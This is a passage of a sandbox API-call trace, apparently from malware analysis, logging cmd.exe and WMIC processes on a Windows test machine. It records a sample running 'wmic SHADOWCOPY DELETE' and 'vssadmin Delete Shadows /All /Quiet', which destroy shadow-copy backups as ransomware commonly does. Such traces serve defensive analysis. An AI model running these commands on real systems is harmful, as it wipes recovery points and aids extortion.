HALPmcxz\\Desktop\\wmic", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0xffffffff [0077.107] GetLastError () returned 0x2 [0077.107] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.107] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0xffffffff [0077.371] GetLastError () returned 0x2 [0077.371] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, 
dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0xffffffff [0077.372] GetLastError () returned 0x2 [0077.372] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.372] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0xffffffff [0077.372] GetLastError () returned 0x2 [0077.372] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0xffffffff [0077.372] GetLastError () returned 0x2 [0077.372] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.372] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0x5e3490 [0077.373] GetProcessHeap () returned 0x5d0000 [0077.373] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x5e34d0 [0077.373] FindClose (in: hFindFile=0x5e3490 | out: hFindFile=0x5e3490) returned 1 [0077.374] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0xffffffff [0077.376] GetLastError () returned 0x2 [0077.376] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0x5e3490 [0077.378] GetProcessHeap () returned 0x5d0000 [0077.378] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e34d0, Size=0x4) returned 0x5e34d0 [0077.378] FindClose (in: hFindFile=0x5e3490 | out: hFindFile=0x5e3490) returned 1 [0077.378] _wcsicmp (_String1=".EXE", 
_String2=".BAT") returned 3 [0077.379] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0077.379] GetConsoleTitleW (in: lpConsoleTitle=0x34f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0077.379] InitializeProcThreadAttributeList (in: lpAttributeList=0x34f114, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x34f1dc | out: lpAttributeList=0x34f114, lpSize=0x34f1dc) returned 1 [0077.379] UpdateProcThreadAttribute (in: lpAttributeList=0x34f114, dwFlags=0x0, Attribute=0x60001, lpValue=0x34f1d4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x34f114, lpPreviousValue=0x0) returned 1 [0077.379] GetStartupInfoW (in: lpStartupInfo=0x34f0d0 | out: lpStartupInfo=0x34f0d0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0077.379] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x18) returned 0x5e3490 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", 
_MaxCount=0x7) returned -5 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned 
-17 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0077.380] GetProcessHeap () returned 0x5d0000 [0077.380] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e3490 | out: hHeap=0x5d0000) returned 1 [0077.380] GetProcessHeap () returned 0x5d0000 [0077.380] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xa) returned 0x5dff08 [0077.380] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0077.382] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic SHADOWCOPY DELETE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x34f170*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic SHADOWCOPY DELETE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x34f1bc | out: lpCommandLine="wmic SHADOWCOPY DELETE", lpProcessInformation=0x34f1bc*(hProcess=0x78, hThread=0x74, dwProcessId=0x208, dwThreadId=0x20c)) returned 1 [0078.386] CloseHandle (hObject=0x74) returned 1 [0078.386] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0078.386] GetProcessHeap () returned 0x5d0000 
[0078.386] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e5ef8 | out: hHeap=0x5d0000) returned 1 [0078.386] GetEnvironmentStringsW () returned 0x5e5ef8* [0078.386] GetProcessHeap () returned 0x5d0000 [0078.386] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb36) returned 0x5e40b8 [0078.386] FreeEnvironmentStringsW (penv=0x5e5ef8) returned 1 [0078.386] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) Process: id = "11" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x45bfa000" os_pid = "0xb40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 39 os_tid = 0xb90 [0076.700] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x34ff7c | out: lpSystemTimeAsFileTime=0x34ff7c*(dwLowDateTime=0xf27eefc0, dwHighDateTime=0x1d61645)) [0076.700] GetCurrentProcessId () returned 0xb40 [0076.700] GetCurrentThreadId () returned 0xb90 [0076.700] GetTickCount () returned 0x11496b4 [0076.700] QueryPerformanceCounter (in: lpPerformanceCount=0x34ff74 | out: lpPerformanceCount=0x34ff74*=19705447843) returned 1 [0076.701] GetModuleHandleA (lpModuleName=0x0) returned 0x4a800000 [0076.701] __set_app_type (_Type=0x1) [0076.701] __p__fmode () returned 0x770331f4 [0076.701] __p__commode () returned 0x770331fc [0076.702] SetUnhandledExceptionFilter 
(lpTopLevelExceptionFilter=0x4a8221a6) returned 0x0 [0076.702] __getmainargs (in: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c, _DoWildCard=0, _StartInfo=0x4a824140 | out: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c) returned 0 [0076.702] GetCurrentThreadId () returned 0xb90 [0076.702] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb90) returned 0x60 [0076.703] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.703] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0076.703] SetThreadUILanguage (LangId=0x0) returned 0x409 [0076.703] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0076.703] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x34ff0c | out: phkResult=0x34ff0c*=0x0) returned 0x2 [0076.703] VirtualQuery (in: lpAddress=0x34ff43, lpBuffer=0x34fedc, dwLength=0x1c | out: lpBuffer=0x34fedc*(BaseAddress=0x34f000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.704] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x34fedc, dwLength=0x1c | out: lpBuffer=0x34fedc*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0076.704] VirtualQuery (in: lpAddress=0x251000, lpBuffer=0x34fedc, dwLength=0x1c | out: lpBuffer=0x34fedc*(BaseAddress=0x251000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0076.704] VirtualQuery (in: lpAddress=0x253000, lpBuffer=0x34fedc, dwLength=0x1c | out: lpBuffer=0x34fedc*(BaseAddress=0x253000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.704] 
VirtualQuery (in: lpAddress=0x350000, lpBuffer=0x34fedc, dwLength=0x1c | out: lpBuffer=0x34fedc*(BaseAddress=0x350000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x160000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0076.704] GetConsoleOutputCP () returned 0x1b5 [0076.704] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.704] SetConsoleCtrlHandler (HandlerRoutine=0x4a81e72a, Add=1) returned 1 [0076.704] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.704] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0076.704] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.704] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0076.705] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.705] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0076.705] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.705] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0076.705] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.705] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0076.706] GetEnvironmentStringsW () returned 0x6a2058* [0076.706] GetProcessHeap () returned 0x690000 [0076.706] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xaca) returned 0x6a2b30 [0076.706] FreeEnvironmentStringsW (penv=0x6a2058) returned 1 [0076.706] GetProcessHeap () returned 0x690000 [0076.706] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4) returned 0x6a0c90 [0076.706] GetEnvironmentStringsW () returned 0x6a2058* [0076.706] GetProcessHeap () returned 0x690000 [0076.706] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xaca) returned 0x6a3608 [0076.706] FreeEnvironmentStringsW (penv=0x6a2058) returned 1 [0076.707] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34ee7c | out: phkResult=0x34ee7c*=0x68) 
returned 0x0 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x0, lpData=0x34ee88*=0x0, lpcbData=0x34ee80*=0x1000) returned 0x2 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x1, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x0, lpData=0x34ee88*=0x1, lpcbData=0x34ee80*=0x1000) returned 0x2 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x0, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x40, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x40, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x0, lpData=0x34ee88*=0x40, lpcbData=0x34ee80*=0x1000) returned 0x2 [0076.707] RegCloseKey (hKey=0x68) returned 0x0 [0076.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34ee7c | out: phkResult=0x34ee7c*=0x68) returned 0x0 [0076.707] RegQueryValueExW (in: hKey=0x68, 
lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x0, lpData=0x34ee88*=0x40, lpcbData=0x34ee80*=0x1000) returned 0x2 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x1, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.708] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x0, lpData=0x34ee88*=0x1, lpcbData=0x34ee80*=0x1000) returned 0x2 [0076.708] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x0, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.708] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x9, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.708] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x9, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.708] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x0, lpData=0x34ee88*=0x9, lpcbData=0x34ee80*=0x1000) returned 0x2 [0076.708] RegCloseKey (hKey=0x68) returned 0x0 [0076.708] time (in: timer=0x0 | out: timer=0x0) returned 0x5e9c43c9 [0076.708] srand (_Seed=0x5e9c43c9) [0076.708] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin Delete Shadows /All /Quiet" [0076.708] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin Delete 
Shadows /All /Quiet" [0076.708] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.708] GetProcessHeap () returned 0x690000 [0076.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x6a2058 [0076.709] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6a2060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0076.709] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0076.709] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.709] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.709] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0076.709] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0076.709] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0076.709] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0076.709] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0076.709] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0076.709] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0076.709] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0076.709] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0076.709] GetProcessHeap () returned 0x690000 [0076.709] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2b30 | out: hHeap=0x690000) returned 1 [0076.709] GetEnvironmentStringsW () returned 0x6a2270* [0076.709] GetProcessHeap () returned 0x690000 [0076.709] RtlAllocateHeap 
(HeapHandle=0x690000, Flags=0x8, Size=0xae2) returned 0x6a4bd0 [0076.710] FreeEnvironmentStringsW (penv=0x6a2270) returned 1 [0076.710] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0076.710] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.710] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0076.710] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0076.710] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0076.710] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0076.710] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0076.710] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0076.710] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0076.710] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0076.710] GetProcessHeap () returned 0x690000 [0076.710] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x54) returned 0x6a56c0 [0076.710] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x34fc48 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x34fc48, lpFilePart=0x34fc44 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34fc44*="Desktop") returned 0x25 [0076.710] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.711] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x34f9c4 | out: lpFindFileData=0x34f9c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 
ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6a1ed8 [0076.711] FindClose (in: hFindFile=0x6a1ed8 | out: hFindFile=0x6a1ed8) returned 1 [0076.711] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x34f9c4 | out: lpFindFileData=0x34f9c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6a1ed8 [0076.711] FindClose (in: hFindFile=0x6a1ed8 | out: hFindFile=0x6a1ed8) returned 1 [0076.711] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0076.711] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x34f9c4 | out: lpFindFileData=0x34f9c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe392fd80, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xe392fd80, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6a1ed8 [0076.712] FindClose (in: hFindFile=0x6a1ed8 | out: hFindFile=0x6a1ed8) returned 1 [0076.712] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.712] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 
